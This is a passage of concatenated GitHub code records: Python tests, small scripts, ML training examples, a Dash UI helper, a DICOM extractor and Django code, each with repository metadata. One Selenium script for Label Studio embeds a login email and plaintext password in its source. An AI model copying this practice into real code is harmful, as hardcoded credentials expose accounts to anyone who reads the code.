'wb') as file:\n file.write(source)\n loader = _bootstrap.SourceFileLoader(self.module_name,\n mapping[self.module_name])\n return loader.load_module(self.module_name)\n\n def create_source(self, encoding):\n encoding_line = \"# coding={0}\".format(encoding)\n assert CODING_RE.match(encoding_line)\n source_lines = [encoding_line.encode('utf-8')]\n source_lines.append(self.source_line.encode(encoding))\n return b'\\n'.join(source_lines)\n\n def test_non_obvious_encoding(self):\n # Make sure that an encoding that has never been a standard one for\n # Python works.\n encoding_line = \"# coding=koi8-r\"\n assert CODING_RE.match(encoding_line)\n source = \"{0}\\na=42\\n\".format(encoding_line).encode(\"koi8-r\")\n self.run_test(source)\n\n # [default encoding]\n def test_default_encoding(self):\n self.run_test(self.source_line.encode('utf-8'))\n\n # [encoding first line]\n def test_encoding_on_first_line(self):\n encoding = 'Latin-1'\n source = self.create_source(encoding)\n self.run_test(source)\n\n # [encoding second line]\n def test_encoding_on_second_line(self):\n source = b\"#/usr/bin/python\\n\" + self.create_source('Latin-1')\n self.run_test(source)\n\n # [BOM]\n def test_bom(self):\n self.run_test(codecs.BOM_UTF8 + self.source_line.encode('utf-8'))\n\n # [BOM and utf-8]\n def test_bom_and_utf_8(self):\n source = codecs.BOM_UTF8 + self.create_source('utf-8')\n self.run_test(source)\n\n # [BOM conflict]\n def test_bom_conflict(self):\n source = codecs.BOM_UTF8 + self.create_source('latin-1')\n with self.assertRaises(SyntaxError):\n self.run_test(source)\n\n\nclass LineEndingTest(unittest.TestCase):\n\n r\"\"\"Source written with the three types of line endings (\\n, \\r\\n, \\r)\n need to be readable [cr][crlf][lf].\"\"\"\n\n def run_test(self, line_ending):\n module_name = '_temp'\n source_lines = [b\"a = 42\", b\"b = -13\", b'']\n source = line_ending.join(source_lines)\n with source_util.create_modules(module_name) as mapping:\n with open(mapping[module_name], 'wb') as file:\n file.write(source)\n loader = _bootstrap.SourceFileLoader(module_name,\n mapping[module_name])\n return loader.load_module(module_name)\n\n # [cr]\n def test_cr(self):\n self.run_test(b'\\r')\n\n # [crlf]\n def test_crlf(self):\n self.run_test(b'\\r\\n')\n\n # [lf]\n def test_lf(self):\n self.run_test(b'\\n')\n\n\ndef test_main():\n from test.support import run_unittest\n run_unittest(EncodingTest, LineEndingTest)\n\n\nif __name__ == 
'__main__':\n test_main()\n","repo_name":"pyparallel/pyparallel","sub_path":"Lib/test/test_importlib/source/test_source_encoding.py","file_name":"test_source_encoding.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":579,"dataset":"github-code","pt":"67"} +{"seq_id":"14647457806","text":"# 4. Convert the given time into hour/minute/seconds.\n# (The input is taken as second = 8523 - hh: mm: ss)\n# int S = seconds % 60\n# int H = seconds / 60\n# int M = H % 60\n# H = H / 60\n\n\ns = int(input(\"Enter the Time in Seconds: \"))\n\nsec = s % 60\nh = s / 60\nm = h % 60\nh = h / 60\n\nprint(int(h), \":\", int(m), \":\", int(sec))\n","repo_name":"MIG58/Python3-College","sub_path":"Lab2/Convert_HH-MM-SS.py","file_name":"Convert_HH-MM-SS.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12722574513","text":"import logging\nfrom dataclasses import dataclass\n\nfrom syne_tune.blackbox_repository import BlackboxRepositoryBackend\nfrom syne_tune.backend.simulator_backend.simulator_callback import SimulatorCallback\nfrom syne_tune.experiments import load_experiment\nfrom syne_tune.optimizer.baselines import ASHA\nfrom syne_tune import Tuner, StoppingCriterion\nfrom syne_tune.config_space import Domain\nfrom syne_tune.try_import import try_import_visual_message\n\ntry:\n import matplotlib.pyplot as plt\nexcept ImportError:\n print(try_import_visual_message())\n\n\ndef plot_yahpo_learning_curves(\n trial_backend, benchmark: str, time_col: str, metric_col: str\n):\n bb = trial_backend.blackbox\n plt.figure()\n plt.title(\n f\"Learning curves from Yahpo {benchmark} for 10 different hyperparameters.\"\n )\n for i in range(10):\n config = {\n k: v.sample() if isinstance(v, Domain) else v\n for k, v in bb.configuration_space.items()\n }\n evals = bb(config)\n time_index = next(\n i for i, name in enumerate(bb.objectives_names) if name == time_col\n )\n accuracy_index = next(\n i for i, name in enumerate(bb.objectives_names) if name == metric_col\n )\n import numpy as np\n\n if np.diff(evals[:, time_index]).min() < 0:\n print(\"negative time between two different steps...\")\n plt.plot(evals[:, time_index], evals[:, accuracy_index])\n plt.xlabel(time_col)\n plt.ylabel(metric_col)\n plt.show()\n\n\n@dataclass\nclass BenchmarkInfo:\n blackbox_name: str\n elapsed_time_attr: str\n metric: str\n dataset: str\n mode: str\n max_t: int\n resource_attr: str\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n benchmark_infos = {\n \"nb301\": BenchmarkInfo(\n elapsed_time_attr=\"runtime\",\n metric=\"val_accuracy\",\n blackbox_name=\"yahpo-nb301\",\n dataset=\"CIFAR10\",\n mode=\"max\",\n max_t=97,\n resource_attr=\"epoch\",\n ),\n \"lcbench\": BenchmarkInfo(\n elapsed_time_attr=\"time\",\n metric=\"val_accuracy\",\n blackbox_name=\"yahpo-lcbench\",\n dataset=\"3945\",\n mode=\"max\",\n max_t=51,\n resource_attr=\"epoch\",\n ),\n \"fcnet\": BenchmarkInfo(\n elapsed_time_attr=\"runtime\",\n metric=\"valid_mse\",\n blackbox_name=\"yahpo-fcnet\",\n dataset=\"fcnet_naval_propulsion\",\n mode=\"min\",\n max_t=99,\n resource_attr=\"epoch\",\n ),\n }\n for benchmark in [\"nb301\", \"lcbench\", \"fcnet\"]:\n benchmark_info = benchmark_infos[benchmark]\n\n trial_backend = BlackboxRepositoryBackend(\n blackbox_name=benchmark_info.blackbox_name,\n elapsed_time_attr=benchmark_info.elapsed_time_attr,\n dataset=benchmark_info.dataset,\n )\n\n 
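A brief aside on the seconds-to-hh:mm:ss converter a few records above: the chain of `% 60` and `/ 60` steps is usually written with `divmod`, which returns quotient and remainder in one call and avoids the float division the original script then truncates with `int()`. A minimal sketch under that reading (the `to_hms` name is ours, not the original script's):

```python
def to_hms(total_seconds: int) -> str:
    # divmod returns (quotient, remainder) in a single call
    minutes, seconds = divmod(total_seconds, 60)
    hours, minutes = divmod(minutes, 60)
    return f"{hours}:{minutes:02}:{seconds:02}"

# The sample input mentioned in the converter's comment block
assert to_hms(8523) == "2:22:03"
```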
plot_yahpo_learning_curves(\n trial_backend,\n benchmark=benchmark,\n time_col=benchmark_info.elapsed_time_attr,\n metric_col=benchmark_info.metric,\n )\n\n max_resource_attr = \"epochs\"\n config_space = dict(\n trial_backend.blackbox.configuration_space,\n **{max_resource_attr: benchmark_info.max_t},\n )\n scheduler = ASHA(\n config_space=config_space,\n max_resource_attr=max_resource_attr,\n resource_attr=benchmark_info.resource_attr,\n mode=benchmark_info.mode,\n metric=benchmark_info.metric,\n )\n\n stop_criterion = StoppingCriterion(max_num_trials_started=100)\n\n # It is important to set ``sleep_time`` to 0 here (mandatory for simulator\n # backend)\n tuner = Tuner(\n trial_backend=trial_backend,\n scheduler=scheduler,\n stop_criterion=stop_criterion,\n n_workers=4,\n sleep_time=0,\n print_update_interval=10,\n # This callback is required in order to make things work with the\n # simulator callback. It makes sure that results are stored with\n # simulated time (rather than real time), and that the time_keeper\n # is advanced properly whenever the tuner loop sleeps\n callbacks=[SimulatorCallback()],\n tuner_name=f\"ASHA-Yahpo-{benchmark}\",\n )\n tuner.run()\n\n tuning_experiment = load_experiment(tuner.name)\n tuning_experiment.plot()\n","repo_name":"awslabs/syne-tune","sub_path":"examples/launch_asha_yahpo.py","file_name":"launch_asha_yahpo.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"67"} +{"seq_id":"9541921342","text":"\nimport sys\nimport os\n\n# This file controls parallel shell code files.\ndef main():\n\tif sys.argv[1] == '-c': # copy file argv[2] to file argv[3]\n\t\twith open(sys.argv[2], 'r') as in_file: # Read a dimacs file\n\t\t\tin_content = in_file.readlines()\n\t\twith open(sys.argv[3], 'w') as out_file:\n\t\t\tfor line in in_content:\n\t\t\t\tout_file.write(line)\n\tif sys.argv[1] == '-r': # replace the argv[3]th line of argv[2] with argv[4] \n\t\tchangedIndex = int(sys.argv[3]) - 1\n\t\twith open(sys.argv[2], 'r') as in_file: # Read a dimacs file\n\t\t\tin_content = in_file.readlines()\n\t\tos.remove(sys.argv[2])\n\t\twith open(sys.argv[2], 'w') as out_file:\n\t\t\tfor i in range(len(in_content)):\n\t\t\t\tif i != changedIndex:\n\t\t\t\t\tout_file.write(in_content[i])\n\t\t\t\telse:\n\t\t\t\t\tout_file.write(sys.argv[4] + \"\\n\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anwu1219/summer2016","sub_path":"myProgram/python/bashControl.py","file_name":"bashControl.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30829279240","text":"from typing import Any\n\nfrom m.core import Bad, Good, Res, issue, one_of\nfrom m.log import EnvVars\nfrom pydantic import BaseModel\n\nfrom .config import Config, Workflow\nfrom .git_env import GitEnv\n\n\nclass ReleaseEnv(BaseModel):\n \"\"\"Object to store the release configuration.\"\"\"\n\n build_tag: str\n python_tag: str\n is_release: bool\n is_release_pr: bool\n is_hotfix_pr: bool\n workflow: Workflow\n\n\ndef _verify_version(\n config: Config,\n git_env: GitEnv,\n gh_latest: str,\n is_release_pr: bool,\n is_release: bool,\n) -> Res[int]:\n if config.workflow in {Workflow.git_flow, Workflow.m_flow}:\n if config.uses_git_flow():\n pr_branch = git_env.get_pr_branch()\n flow = config.git_flow\n prefixes = (flow.release_prefix, flow.hotfix_prefix)\n # Skip verification when release or hotfix are going to develop\n if 
git_env.target_branch == flow.develop_branch:\n if pr_branch.startswith(prefixes):\n return Good(0)\n return config.verify_version(\n gh_latest,\n is_release_pr=is_release_pr,\n is_release=is_release,\n )\n # Covers Workflow.free_flow\n return Good(0)\n\n\ndef _get_develop_branch(config: Config) -> str:\n if config.uses_git_flow():\n return config.git_flow.develop_branch\n return 'develop'\n\n\ndef _extra_checks(\n config: Config,\n git_env: GitEnv,\n is_release_pr: bool,\n is_hotfix_pr: bool,\n) -> Res[Any]:\n # If successful we return None, we do not care about the value thus we\n # are specifying `Any` so that a Bad value may be compatible with other\n # `OneOf`s.\n master_branch = config.get_master_branch()\n develop_branch = _get_develop_branch(config)\n valid_branches = (\n (master_branch,)\n if config.uses_m_flow()\n else (master_branch, develop_branch)\n )\n release_pr = is_release_pr or is_hotfix_pr\n if release_pr and git_env.target_branch not in valid_branches:\n error_type = 'release' if is_release_pr else 'hotfix'\n return issue(f'invalid {error_type}-pr', context={\n 'expected_target_branch': master_branch,\n 'current_target_branch': git_env.target_branch,\n 'workflow': str(config.workflow),\n })\n return Good(None)\n\n\ndef get_release_env(\n config: Config,\n env_vars: EnvVars,\n git_env: GitEnv,\n) -> Res[ReleaseEnv]:\n \"\"\"Provide the release environment information.\n\n Args:\n config: The m configuration.\n env_vars: The environment variables.\n git_env: The git environment.\n\n Returns:\n A `ReleaseEnv` instance.\n \"\"\"\n is_release = git_env.is_release(config)\n is_release_pr = git_env.is_release_pr(config)\n is_hotfix_pr = git_env.is_hotfix_pr(config)\n gh_latest = git_env.release.tag_name if git_env.release else ''\n if not config.uses_free_flow():\n check_result = _extra_checks(\n config,\n git_env,\n is_release_pr=is_release_pr,\n is_hotfix_pr=is_hotfix_pr,\n )\n if isinstance(check_result, Bad):\n return check_result\n return one_of(lambda: [\n ReleaseEnv(\n build_tag=build_tag,\n python_tag=python_tag,\n is_release=is_release,\n is_release_pr=is_release_pr,\n is_hotfix_pr=is_hotfix_pr,\n workflow=config.workflow,\n )\n for _ in _verify_version(\n config,\n git_env,\n gh_latest,\n is_release_pr=is_release_pr or is_hotfix_pr,\n is_release=is_release,\n )\n for build_tag in git_env.get_build_tag(config, env_vars.run_id)\n for python_tag in git_env.get_py_tag(config, env_vars.run_id)\n ])\n","repo_name":"jmlopez-rod/m","sub_path":"packages/python/m/ci/release_env.py","file_name":"release_env.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"1126291247","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 30 19:55:21 2018\r\n\r\n@author: Helena\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\n\r\n# Get Data\r\nwith np.load('./notMNIST.npz') as data :\r\n Data, Target = data [\"images\"], data[\"labels\"]\r\n np.random.seed(521)\r\n randIndx = np.arange(len(Data))\r\n np.random.shuffle(randIndx)\r\n Data = Data[randIndx]/255.\r\n Target = Target[randIndx]\r\n trainData, trainTarget = Data[:15000], Target[:15000]\r\n validData, validTarget = Data[15000:16000], Target[15000:16000]\r\n testData, testTarget = Data[16000:], Target[16000:]\r\n# one-hot \r\ntrainZeros=np.zeros((15000, 10))\r\ntrainZeros[np.arange(15000),trainTarget]=1\r\ntrainTarget = 
trainZeros\r\nvalidZeros=np.zeros((1000, 10))\r\nvalidZeros[np.arange(1000),validTarget]=1\r\nvalidTarget = validZeros\r\ntestZeros=np.zeros((2724, 10))\r\ntestZeros[np.arange(2724),testTarget]=1\r\ntestTarget = testZeros\r\n\r\n# Extract batch_size batches randomly \r\ndef grab_batches(trainData, trainTarget, batch_size):\r\n batch_indices = np.random.permutation(range(15000)).reshape(-1, batch_size)\r\n X_batches = trainData.reshape(-1, n_dim)[batch_indices]\r\n y_batches = trainTarget[batch_indices]\r\n batches = zip(X_batches, y_batches)\r\n return batches\r\n \r\n# Hyperparam\r\nlearning_rate = 0.005\r\nn_epochs = 25\r\nbatch_size = 500\r\nweight_decays=[0]\r\ndrop = 0\r\n \r\n# Setup training \r\nn_dim = 28*28\r\nX = tf.placeholder(tf.float32,[None,n_dim])\r\nY = tf.placeholder(tf.float32,[None,10])\r\n# layer 1\r\ninitializer = tf.contrib.layers.xavier_initializer(uniform=False)\r\nW1 = tf.Variable(initializer([X.shape[1].value, 1000]), name='weights')\r\nb1 = tf.Variable(tf.zeros(1000), name='biases') \r\nS1 = tf.add(tf.matmul(X, W1), b1)\r\n# layer 2\r\nX2 = tf.nn.relu(S1)\r\ninitializer = tf.contrib.layers.xavier_initializer(uniform=False)\r\nW2 = tf.Variable(initializer([X2.shape[1].value, 10]), name='weights')\r\nb2 = tf.Variable(tf.zeros(10), name='biases')\r\nif drop:\r\n X_drop = tf.nn.dropout(X2, keep_prob=0.5) \r\nelse:\r\n X_drop = X2\r\ny_ = tf.add(tf.matmul(X_drop, W2), b2)\r\n\r\nloss_drop = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=Y, logits=y_))\r\n#regularizer = tf.nn.l2_loss(W)\r\n#loss = tf.reduce_mean(loss + weight_decay * regularizer)\r\n\r\nprediction = tf.cast(tf.round(tf.argmax(y_,1)), tf.int8)\r\nequality = tf.equal(prediction, tf.cast(tf.argmax(Y,1), tf.int8))\r\naccuracy = tf.reduce_mean(tf.cast(equality, tf.float32))\r\n\r\ntraining_step = tf.train.AdamOptimizer(learning_rate).minimize(loss_drop)\r\ninit = tf.global_variables_initializer()\r\n \r\n# Training\r\nvalid_accuracies = []\r\ntrain_accuracies = []\r\n#test_accuracies = []\r\nwith tf.Session() as sess:\r\n for wd in weight_decays:\r\n sess.run(init)\r\n print(\"Weight Decay: {} \\n\".format(wd))\r\n for epoch in range(1,n_epochs+1):\r\n batches = grab_batches(trainData, trainTarget, batch_size)\r\n for X_batch, y_batch in batches:\r\n sess.run(training_step, feed_dict={X: X_batch, Y: y_batch})\r\n # Evaluate losses (without dropout)\r\n feed_dict ={X: trainData.reshape(-1,n_dim), Y: trainTarget}\r\n train_accuracy = sess.run(accuracy, feed_dict)\r\n print(\"Epoch: {}, Accuracy: {}\".format(epoch, train_accuracy))\r\n train_accuracies.append(train_accuracy)\r\n valid_accuracy = sess.run(accuracy,feed_dict = {X: validData.reshape(-1,n_dim), Y: validTarget})\r\n valid_accuracies.append(valid_accuracy)\r\n# test_accuracy = sess.run(accuracy, feed_dict = {X: testData.reshape(-1,n_dim), Y: testTarget})\r\n# test_accuracies.append(test_accuracy)\r\n \r\n # Plots\r\n plt.figure(figsize=(10,10))\r\n plt.title('Accuracies for training and validation')\r\n plt.scatter(np.arange(n_epochs), train_accuracies, marker='x', color='r', label = 'training')\r\n plt.scatter(np.arange(n_epochs), valid_accuracies, marker='d', color='b', label = 'validation')\r\n #plt.scatter(np.arange(n_epochs), test_accuracies, marker='o', color='g', label = 'testing')\r\n plt.legend(loc='upper right') \r\n plt.xlabel('Epoch')\r\n plt.ylabel('Accuracy')\r\n plt.grid(True)\r\n plt.show()\r\n \r\n # Visualize weights\r\n sample_num=100 \r\n shuffled_idx = np.random.permutation(1000)\r\n 
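The one-hot encoding blocks above use the `np.zeros` plus fancy-indexing idiom; an equivalent and common alternative indexes rows of an identity matrix. A self-contained sketch with made-up labels, not taken from the notMNIST data:

```python
import numpy as np

labels = np.array([3, 0, 9])      # example class indices
one_hot = np.eye(10)[labels]      # row i of eye(10) is the one-hot vector for class i
assert one_hot.shape == (3, 10)
assert one_hot[0, 3] == 1.0 and one_hot.sum() == 3.0
```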
scale=255/sess.run(tf.reduce_max(tf.abs(W1)))\r\n for ii in range(0,sample_num):\r\n weight_array=tf.reshape(W1[:,shuffled_idx[ii]],[28,28])\r\n img = Image.fromarray(scale*sess.run(weight_array)).convert('L')\r\n arr = np.asarray(img)\r\n plt.subplot(10,10,ii+1).axis('off')\r\n plt.imshow(arr, cmap='gray')\r\n #print(sess.run(W1))\r\n \r\n \r\n \r\n \r\n","repo_name":"fncode246/ECE521","sub_path":"Assignment3/Part1.3.py","file_name":"Part1.3.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71553930133","text":"from setuptools import setup\n\nimport os\nimport shutil\n\n# Copy the krb5.conf file into the source tree if necessary\n_this_dir = os.path.abspath(os.path.dirname(os.path.relpath(__file__)))\nkrb5_conf = os.path.join(_this_dir, 'images', 'hadoop-testing-kerberos',\n 'files', 'etc', 'krb5.conf')\nkrb5_target = os.path.join(_this_dir, 'hadoop_test_cluster', 'krb5.conf')\nif os.path.exists(krb5_conf):\n shutil.copyfile(krb5_conf, krb5_target)\n\n\nsetup(name='hadoop-test-cluster',\n version='0.1.0',\n url=\"https://github.com/jcrist/hadoop-test-cluster\",\n maintainer='Jim Crist-Harif',\n maintainer_email='jcristharif@gmail.com',\n license='BSD',\n description='A CLI for managing hadoop clusters for testing',\n long_description=open('README.rst').read(),\n packages=['hadoop_test_cluster'],\n package_data={'hadoop_test_cluster': ['docker-compose.yaml',\n 'krb5.conf']},\n entry_points='''\n [console_scripts]\n htcluster=hadoop_test_cluster.cli:main\n ''',\n zip_safe=False)\n","repo_name":"jcrist/hadoop-test-cluster","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"67"} +{"seq_id":"6523900049","text":"\"\"\"\nA collection of functions to extended core components that can be reused\nacross apps.\n\n\nAdding the follow new components\n\n* Extended core Silder to include a label\n* Extended core Dropdown to include a label\n* A formated Upload box\n\"\"\"\n\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\ndef _merge(a, b):\n return dict(a, **b)\n\n\ndef _omit(omitted_keys, d):\n return {k: v for k, v in d.items() if k not in omitted_keys}\n\n\ndef NamedSlider(name='', **kwargs):\n return html.Div(\n style={'padding': '10px 10px 15px 4px'},\n children=[\n html.P(f'{name}:'),\n html.Div(dcc.Slider(**kwargs), style={'margin-left': '6px'})\n ]\n )\n\n\ndef NamedDropdown(name='', **kwargs):\n return html.Div([\n html.P(f'{name}:', style={'margin-left': '3px'}),\n dcc.Dropdown(**kwargs)\n ])\n\n\n\"\"\"\nRequires Bootstrap for styling\n\"\"\"\ndef Upload_Box(id='upload',\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n}):\n return html.Div(className='row', children=[\n html.Div(className='col-md-12', children=[\n dcc.Upload(\n id='upload',\n children=html.Div([\n 'Drag and Drop or ',\n html.A('Select a File'),\n ' to change data'\n ]),\n style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '10px'\n }\n )\n ])\n 
])","repo_name":"jlondal/base_dash_app","sub_path":"regression_explorer/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26201954759","text":"import sys\n\nimport pydicom\n\n\ndef extract_plan_setupbeam_isocenter(_ds: pydicom.Dataset) -> list[str]:\n \"\"\"Extracts the isocenter from the first beam in the plan\n\n Args:\n ds (pydicom.Dataset): dataset representing the plan\n\n Returns:\n list[str]: the isocenter in the first beam\n \"\"\"\n plan_setup_iso = []\n plan_setup_iso = _ds.IonBeamSequence[0].IonControlPointSequence[0].IsocenterPosition\n if len(plan_setup_iso) == 0:\n raise ValueError(\"No isocenter in first beam of plan\")\n\n return plan_setup_iso\n\n\nif __name__ == \"__main__\":\n PLAN_PATH = sys.argv[1]\n # print(path)\n plan_ds = pydicom.dcmread(PLAN_PATH, force=True)\n plan_iso = extract_plan_setupbeam_isocenter(plan_ds)\n print(plan_iso)\n","repo_name":"sjswerdloff/rtregistrationcalc","sub_path":"extract_plan_setupbeam_isocenter.py","file_name":"extract_plan_setupbeam_isocenter.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"11109354612","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom django.core.management.base import BaseCommand\nfrom services.reminder import Reminder\nfrom ...utils import load_config\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n\n parser.add_argument(\n '--max', '-m',\n action='store',\n dest='max',\n type=int,\n default=0,\n help='Max count to fetch.',\n )\n\n parser.add_argument(\n '--test', '-e',\n action='store_true',\n dest='test',\n default=False,\n help='If test specified, will only fetch tester users.',\n )\n\n parser.add_argument(\n '--config-file', '-f',\n action='store',\n type=str,\n dest='config_file',\n default='config.ini',\n help='Specify a config file. 
Default is config.ini',\n )\n\n def handle(self, *args, **options):\n reminder = Reminder()\n reminder.start()\n\n","repo_name":"samuelchen/twido","sub_path":"twido/management/commands/remind.py","file_name":"remind.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"71538233494","text":"import csv\r\nfrom datetime import datetime\r\nfrom matplotlib import pyplot as plt\r\n\r\nfilename = 'data/sitka_weather_2018_simple.csv'\r\nwith open(filename) as f:\r\n reader = csv.reader(f)\r\n header_row = next(reader)\r\n\r\n # for index, column_header in enumerate(header_row):\r\n # print(index, column_header)\r\n\r\n dates, prcps = [], []\r\n for row in reader:\r\n current_date = datetime.strptime(row[2], '%Y-%m-%d')\r\n dates.append(current_date)\r\n prcp = float(row[3])\r\n prcps.append(prcp)\r\n\r\nplt.style.use('seaborn')\r\nfig, ax = plt.subplots()\r\nax.plot(dates, prcps, c='blue')\r\n\r\nplt.title(\"Daily Precipitation - 2018\", fontsize=24)\r\nplt.xlabel('', fontsize=16)\r\nfig.autofmt_xdate()\r\nplt.ylabel(\"Inches of Rain\", fontsize=16)\r\nplt.tick_params(axis='both', which='major', labelsize=16)\r\n\r\nplt.show()\r\n","repo_name":"MParnin/PythonCrashCourse","sub_path":"Project 02 - Data Visualization/16-1.py","file_name":"16-1.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37088831228","text":"\nfrom selenium import webdriver\n# import chromedriver_autoinstaller\n# chromedriver_autoinstaller.install()\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nPROJECT_NAME = 'Nave_Image_30cls'\n\n# Start registering\ns=Service('./chromedriver')\n# s = Service()\nbrowser = webdriver.Chrome(service=s)\nurl='http://127.0.0.1:8080/user/login/'\nbrowser.get(url)\nuserid = browser.find_element(By.ID, 'email')\npwd = browser.find_element(By.ID, 'password')\nbtn = browser.find_element(By.CLASS_NAME,'ls-button_look_primary')\nuserid.send_keys(\"1@qq.com\")\npwd.send_keys(\"deng@199451\")\nbtn.click()\ntime.sleep(1)\n# try:\nprojcts = browser.find_elements(By.CSS_SELECTOR, '.ls-projects-page__link')\nfor pjt in projcts:\n div = pjt.find_element(By.CSS_SELECTOR, '.ls-project-card__title-text')\n if div.text == PROJECT_NAME:\n pjt.click()\n break\ntime.sleep(2)\n\nbody = browser.find_element(By.CSS_SELECTOR, '.dm-table__virual')\ndata_id = set()\n# data = browser.find_elements(By.CSS_SELECTOR, '.dm-table-row')\ndata = browser.find_elements(By.XPATH,'//div[@class=\"dm-table-row dm-table-row\"]/div[2]')\nfor row in data:\n data_id.add(row.text)\ntemp_height = 0\nwhile True:\n browser.execute_script(f\"arguments[0].scrollBy(0,1000);\", body)\n check_height = browser.execute_script(\"return arguments[0].scrollTop;\", body)\n if check_height == temp_height:\n break\n data = browser.find_elements(By.XPATH,'//div[@class=\"dm-table-row dm-table-row\"]/div[2]')\n for row in data:\n data_id.add(row.text)\n temp_height = check_height\n print('page down', check_height)\n temp_height=check_height\n time.sleep(0.2) #delay\n\nfor id in sorted(list(data_id)):\n print(id)\n # browser.get(f'http://127.0.0.1:8080/projects/24/data?tab=19&task={id}')\n # 
time.sleep(0.5)\n\nbrowser.quit()","repo_name":"dengbuqi/label-studio-api-tool","sub_path":"rollprediction.py","file_name":"rollprediction.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14012131060","text":"from django.shortcuts import render\nfrom django.urls import reverse\n\nfrom misago.categories.serializers import CategoryWithPosterSerializer \\\n as CategorySerializer\nfrom misago.categories.utils import get_categories_tree\n\nfrom userprofiles.decorators import (active_login_required,\n valid_account_required)\n\n\n@active_login_required\n@valid_account_required\ndef categories(request):\n categories_tree = get_categories_tree(request.user, join_posters=True)\n\n request.frontend_context.update({\n 'CATEGORIES': CategorySerializer(\n categories_tree, many=True, context={'request': request}).data,\n 'CATEGORIES_API': reverse('misago:api:category-list'),\n })\n for category in categories_tree:\n for subcategory in category.subcategories:\n subcategory.subscription = False\n return render(request, 'misago/categories/list.html', {\n 'categories': categories_tree,\n })\n","repo_name":"go2people/misago","sub_path":"misago/categories/views/categorieslist.py","file_name":"categorieslist.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25211841078","text":"import numpy as np\nimport pandas as pd\nimport datetime # Auxilia nos logs\nimport GPUtil # Vê a utilização da GPU\nfrom threading import Thread # Abre uma Thread para o Monitor\nimport time # Vê o tempo que o Monitor está rodando\nimport os\nfrom sklearn.model_selection import StratifiedKFold\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n# Camadas: Densa, Pooling Médio\nfrom tensorflow.keras.layers import Dense, GlobalAveragePooling2D\nfrom tensorflow.keras.models import Model # Classe Model\nfrom tensorflow.keras.applications.xception import Xception # Xception\n# Pré-processamento da Xception\nfrom tensorflow.keras.applications.xception import preprocess_input\n# Para melhor observar os logs, utiliza-se o TensorBoard\nfrom tensorflow.keras.callbacks import TensorBoard\n\n'''\n LEMBRETES\n Cheque se a base de dados onde o cross validation irá operar é a PathoSpotter 80-20.\n Cheque se os arquivos 'training_labels.csv' e 'testing_labels.csv' existem na mesma pasta que o script.\n Cheque se o modelo que está fazendo fine tuning realmente está na mesma pasta que o script.\n Para salvar os dados de data augmentation numa pasta, a pasta data_aug deve ser criada.\n'''\n# ---------------------------Classe Monitor------------------------------\n\n\nclass Monitor(Thread):\n def __init__(self, delay):\n super(Monitor, self).__init__()\n self.stopped = False\n self.delay = delay # Time between calls to GPUtil\n self.start()\n\n def run(self):\n while not self.stopped:\n GPUtil.showUtilization()\n time.sleep(self.delay)\n\n def stop(self):\n self.stopped = True\n\n# ------------------------Dados de Configuração--------------------------\n\n\n# Onde se deve buscar as imagens para o treino\ntrain_image_dir = 'PathoSpotter/train/'\ntest_image_dir = 'PathoSpotter/validation/'\nnum_epochs = 2 # Número de Épocas\nn = 1582 # Número de imagens que você vai dar ao algoritmo\nmodel_path = 'model_4.h5' # Modelo de onde o classificador será extraído\n\n# --------------------------Criação de 
